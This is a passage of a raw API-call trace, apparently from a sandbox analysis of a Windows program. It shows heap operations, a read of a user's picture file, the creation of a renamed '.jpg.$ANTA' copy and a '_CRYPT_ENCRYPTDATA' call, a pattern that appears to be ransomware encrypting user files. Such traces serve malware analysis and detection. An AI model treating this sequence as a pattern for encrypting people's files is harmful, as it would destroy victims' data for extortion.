RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0088.318] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0088.318] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0088.318] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0088.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0088.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0088.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0088.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0088.319] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\GbOsv53gLsdhP15shLc.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\gbosv53glsdhp15shlc.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0088.319] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.319] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0088.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0088.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0088.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0088.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0088.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.320] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0088.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0088.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0088.320] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0088.320] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0088.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0088.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0088.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d938 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d938 | out: hHeap=0x1780000) returned 1 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0088.322] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0088.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0088.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0088.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0088.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0088.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0088.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.322] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\GbOsv53gLsdhP15shLc.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\gbosv53glsdhp15shlc.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0088.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0088.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0088.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0088.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0088.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.323] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0088.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0088.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0088.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0088.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0088.324] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0088.324] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0088.324] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0088.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0088.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0c020 [0088.328] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0088.328] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0xf65b, lpOverlapped=0x0) returned 1 [0088.331] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0088.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf65b) returned 0x4516010 [0088.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0c020 | out: hHeap=0x1780000) returned 1 [0088.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0088.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0088.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf65b) returned 0x4525678 [0088.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0088.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.337] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0088.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0088.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf65b) returned 0x4516010 [0088.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0088.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0088.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.337] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0088.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0088.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0088.338] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0088.338] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0088.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0088.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf65b) returned 0x4516010 [0088.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0088.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0088.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0088.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0088.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0088.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf65b) returned 0x4534ce0 [0088.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0088.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0088.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0088.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0088.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.340] 